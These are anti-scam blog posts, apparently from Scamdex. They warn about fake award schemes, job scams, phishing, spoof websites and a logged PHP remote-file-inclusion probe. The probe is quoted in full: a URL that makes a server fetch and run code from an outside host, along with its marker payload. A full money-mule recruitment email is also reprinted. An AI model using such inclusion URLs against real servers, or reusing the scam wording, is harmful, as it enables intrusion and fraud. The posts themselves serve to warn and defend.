spoof websites

Spurious Awards Scam

The “Spurious Award Scam” is a vanity-targetted scam, similar to the “Who’s Who” scam where you are to be honored by inclusion in an index of the Brightest and Best, but in the small print is a small charge for inclusion.

This scam ionvolves businesses being ‘awarded’ some supposed honor, involving a certificate, and what the financial industry call a tombstone – a plastic block to leave at reception to show you won it.

The certificate is a worthless peice of paper, knocked up on a printer for about 0.0001c and the trophy, if it arrives at all is worth less than the packaging it came in.

A Scam TipOff post led me here –

The United States Trade & Commerce Institute (USTCI) scams companies into purchasing expensive trophies and related packages for awards they have supposedly earned, though the selection appears to be completely random and is often incorrect. Some companies receive the notices for excellence in a year that they were not even in business, or for doing types of work that are not applicable, or for being based in a country in which they do not even do business. This organization has been scamming small businesses for several years, and has gone by numerous DBAs, as bad press has forced them to shut down and rename. The USTCI, for example, recently changed its name from the Small Business Institute for Excellence in Commerce after people began to complain.

and this:

…all they wanted to do was charge me $100 for a meaningless certificate or three times that amount for a tacky acryllic award trophy.

See more Scam TipOffs at: http://www.scamdex.com/ScamTipReports/19339

This long-running scam uses a variety of domain names, often variations of the letters USTCI (ustci.org, ustcri.org, usiatc.org etc), they change often enough to stay off the search engines. USTCI.ORG was, at time of writing, hosted by singlehop.com in the US but has since moved to being hosted by a Chinese ISP.

From now on, I’m going to name the ISP’s of spammer/scammers in the hope that the negative publicity may cause them to more closely examine the ‘operations’ that the websites they host are involved in.

The [domain] names change, but the “Data Conversion Job” Scam remains the same…

“Data Conversion Job Scam”?

Yes – this has been running for several months now. This is how it works:

A spam email, probably coming via a job seekers website [such as Careerbuilder.com or Dice.com or Monster.com or Craigslist.com] tells the victim about a great employment opportunity he can do at home – all he has to do is transcribe some written text into a software program and send it off.

Scam Job Website Garindata from Scamdex

The employer website domain name changes but they almost always use the term ‘E-Books Conversion and Data Technology’ and is similar to the image here.
The applicant (Garindata Scam Job Application Form) ALWAYS gets the job and, after agreeing to the benefits etc, is directed to go to the website of a software company that has a product that he will need to perform his function. He will, of course, be fully reimbursed with his first paycheck!
The Software company is unique in Internet terms, of being unable to accept any form of credit card, PayPal, MoneyBookers or any other Internet payment method. No – all they accept is WESTERN UNION (which basically means untraceable, uncancellable, unverifiable cash payments). The cost for this ‘software’ is around 57 Euros.

Garindata scam job employment confirmation card


This is the whole scam
(more…)

Phishing Scam of the Day (PenFed)

We received an email today with the promise of a $50 credit to my Pentagon Federal Credit Union (PenFed) account if I completed a customer service survey. The “survey” was sent as an attached HTML (web page) file, which, when completed went to the homepage of PenFed.

Apart from the simple questions, the final part of the form asked for the online account usrname and password and also the PIN number for the bank. If anyone did fill in this form, they will have handed over the keys to their bank account and should expect it to empty pretty quickly.

This is a common enough scam, but stands out for the clever use of bait ($50) and the simple but plausible task required to receive the bait. Enough to blind the recipient to the dangers.

What actually happens when you click ‘Continue’ in the form is that the detalils you entered are sent to a Texas-based Comcast computer –
IP Address 98.195.57.33 (Information on this IP from DomainWhitePages Information) and then immediately redirected to the PenFed website where the user will feel comforted by the secure website url (https://www.penfed.org/)

The only real mistake this scam makes is to use untargetted spam to deliver the message. Non-PenFed members are unlikely to click through and the chances are that websites such as Scamdex.com will pick it up and close the operation down. As of this post, the server is still up and running………

Spoof websites bilk Caledonia man out of $30K

A man in Caledonia, Wisconsin thought he was buying a car from a reputable website (autotrader.com) and paying for it using a reputable financial site (amazonpayments.com). Turned out that both sites were so-called ‘spoof sites’ – Identical copies of valid website, used to capture personal information such as credit card numbers/passwords or, as in this case, to make it appear that a bona-fide tramsaction was taking place.2009 Porsche Cayman

The Porche Cayman he paid $30,000 for did not show up and by the time he realised, the cash had flown to Romania.

The lesson?

Never trust a link supplied to you from email or a website, especially if it is a financial transaction. Always go independantly to websites using your own bookmarks or typing the url in. it’s insanely easy to show the ‘correct’ link but to go to a different one when it is clicked. Financial Sites Always use ‘https’ instead of ‘httpd’. No Exceptions. Look at your online bank url when you are logged in some time.

Check the address bar of your browser. It’s trying to keep you safe.

Read More at the Caledonia Patch website (it’s the real one, trust me!)

TweekServ is a Scam Job (transaction Processing)

TweekServ is a Scam – TweekServ is a Scam | TweekServ is a Scam – TweekServ is a Scam | TweekServ is a Scam – TweekServ is a Scam

It’s just the usual ‘transaction processing’ scam – you get counterfeit checks, they get your hard-earned cash. DO NOT GET INVOLVED.

Hello,

Thank you for your reply and interest in a part-time position with TweekServ Inc.
In the future please e-mail me at job@tweek-servinc.com

The main strategic aim of our company is to provide quick, easy, efficient and secure ways for businesses to outsource services locally, nationally and globally, to maximize their competitive advantage and cost effectiveness.
The goal of our company is to ensure both, the most reliable security level and simplicity of use and availability.
We are happy to offer you the Payment Processing Agent position. 

Here are the job Requirements:
- 18 years of age or older;
- internet access to promptly reply to emails;
- availability by phone (1-2 hours a day);
- a bank account to process payments 

We welcome competent and reliable approach to work, responsibility and initiative in search of the most efficient ways of job implementation.
Each Payment Processing Agent is provided with employment benefits after successful completion of probationary period (30 days). 

The employment benefits include:
- Stock options;
- 401k;
- Flex-Time;
- Health & Dental;
- Professional development programs

You will find detailed description of the job following the link:
http://www.tweek-servinc.com/vacancies/payment

We strongly recommend to read our FAQ:
http://www.tweek-servinc.com/vacancies/payment/faq

Some important facts:
1. You don't need to invest your own money to get started;
2. This is not a sales position. While employed with us, you are guaranteed a Base Salary as well as commission per task processed;
3. Each remittance will be accompanied by an invoice ensuring legality of transaction. 

If you are interested in the offered vacancy or have any questions please contact us at job@tweek-servinc.com
We appreciate your time and sincerely hope to see you in TweekServ Inc team!

Best Regards,

Steven Brown
TweekServ Inc
job@tweek-servinc.com
Phone: 1-347-860-9971
Fax: 1-585-410-6049

*Please note that some e-mails may enter your SPAM folder and may delay our process of communication. Please add our e-mail address to your filter/safe list to ensure that you receive our e-mails without any delay. If for some reason you do not hear from us within 24 hours with further information, please give us a call at 1-347-860-9971 and we will provide you with the necessary information.

Here’s some lies they use to get you interested…. (from their website at http://www.tweek-servinc.com/vacancies/payment/faq#fq_1) (more…)

Powell Exotic Furniture Website Spoof Scam – PEFURNITURE.NET

Administrative assistant needed by Powell Exotic Furniture,Good pay and flexible hours, see attached pdf for more info or sign up via www.pefurniture.net/careers.php

Here’s a new website spoof scam – take the website of a perfectly respectable, American furniture company – Nichols & Stone and copy it. Then substitute the new name ‘Powell Exotic Furniture’ and register a domain name – PEFURNITURE.NET

Here’s the domain name details  – complete rubbish as usual – created in February, updated today.

complete Domain Name: PEFURNITURE.NET
   Registrar: DIRECTI INTERNET SOLUTIONS PVT. LTD. D/B/A PUBLICDOMAINREGISTRY.COM
   Referral URL: http://www.PublicDomainRegistry.com
   Creation Date: 06-feb-2010
   Last update of whois database: Tue, 11 May 2010 21:47:04 UTC <<<

Registration Service Provided By: HIGH HOSTING ENTERPRISES, INC
Contact: +001.8503682092

Registrant:
    PHYLLIS THOMPSON
    William Ace        (surveyciti@rocketmail.com)
    21 E. Penn St
    Mundeline    IL,60060    US
    Tel. +1.2066664204

Obviously this is a scam. do not go there or give any of your details – you have been warned

PHP Exploit URL foxes Apache

There are a lot of smart people out there who know way too much about computers and software and stuff, like this guy: ‘Perishable Press‘. So, can someone clever please tell me why this simple url hangs up a bunch of seemingly dissimilar web servers:

http://www.microsoft.com/errors.php?error=http://abirdseyeviewof.com/files/image/id1.txt?

My banana was once part of a bunch very similar to this one

My banana was once part of a bunch very similar to this one

Here’s the deal – when someone asks for a webpage on Scamdex that doesn’t exist, it shoots me a quick email to tell me about it. That way I can see if anything is broken and if anyone is trying to hack my site. My normal response to obviousl hack-attempts  is to block the IP address or use .htaccess rewrite rules to send them to an oh-so-friendly  ‘go away page‘ :).

In this case, the URL carries a payload that is itself a  link to a file on a remote site, which it hopes I will allow to run on my server. The code (which is reproduced in it’s entirety here) will, if allowed to run, return the word ‘FeelCoMz’ to the ‘sKriptKiDee’, aka ‘Wanker’  on the sending end.

<?php /* Fx29ID */ echo("FeeL"."CoMz"); die("FeeL"."CoMz"); /* Fx29ID */ ?>

So… it didn’t work, I trapped it and it raised a red flag, but then why, when I try the URL does it make a browser stand blinking like a deer in the proverbial headlights for 120 seconds before falling flat on it’s back?

Analyzing the url gets me to this reduction of required parts:

* any .php file path.
* any query string, that contains a ‘http://’ in
* must have a file extension such as txt, gif, png etc.
* must have the trailing ‘?’

will cause the same problem on an awful lot of famous name servers. For example, including mine: scamdex.com, uniplex.com, google.com, microsoft.com, amazon.com etc etc.

For example, in the following link, everything except ‘www.amazon.com’ is made up

http://www.amazon.com/a.php?b=http://c.gif?

but it still exhibits the same behaviour – WTF is going on?

and why, oh why can’t I detect it in my .htaccess file?

First person to:
1. Tell me why it’s happening.
2. Tell me how to detect it and stop it happening.
3. Tell me why Google hates me.

gets a really major serious prize like my personal desktop banana, or this lovely (chipped) coffee mug with the name of a football club I don’t support on it – or even my second best earphones.

Good luck!

_________________________________

Still no replies and it’s still happening…. where have all the gurus gone?

Who or What is BobBear?

In my infrequent callouts to other websites that  (like Scamdex) were  created out of the blind fury experinced by seeing bad people taking money from good people, I have another site for you to take notice of.

But first, a recap:

When Scamdex started in 2004, there were very few sites about scams and Internet fraud; we felt there was a need to educate people and, using the power of Search Engines, set out to make it easy to check on emails and websites.

Since then, the field has  grown – lots of Government-funded sites have sprung up, large Internet organizations  have (finally) acknowledged that fraud does happen and now devote precious pages to warning their customers  “it’s not our fault, please don’t bother trying to sue us” “there are unscrupulous people out there so please don’t use Western Union to but Laptops from Nigeria” etc…

But still Scamdex and the many other privately run websites continue in their (often one-manned) struggle against the odds and so to one of these: ‘BobBear’

Bob Bear Website Logo

Bob Bear Website Logo

Bobbear.co.uk is a voluntary, non-profit site dedicated to providing information on fake companies offering part-time, work from home job scams, in particular money mule or money transfer fraud, aka ‘payment transfer agent’ scams and the related reshipping fraud or ‘parcels agent’ scams. They also provide victim advice and support. If you receive a suspect spam offering you a job or find a website offering fraud jobs then please send them (and us) a copy.

Please support them – you know it makes sense!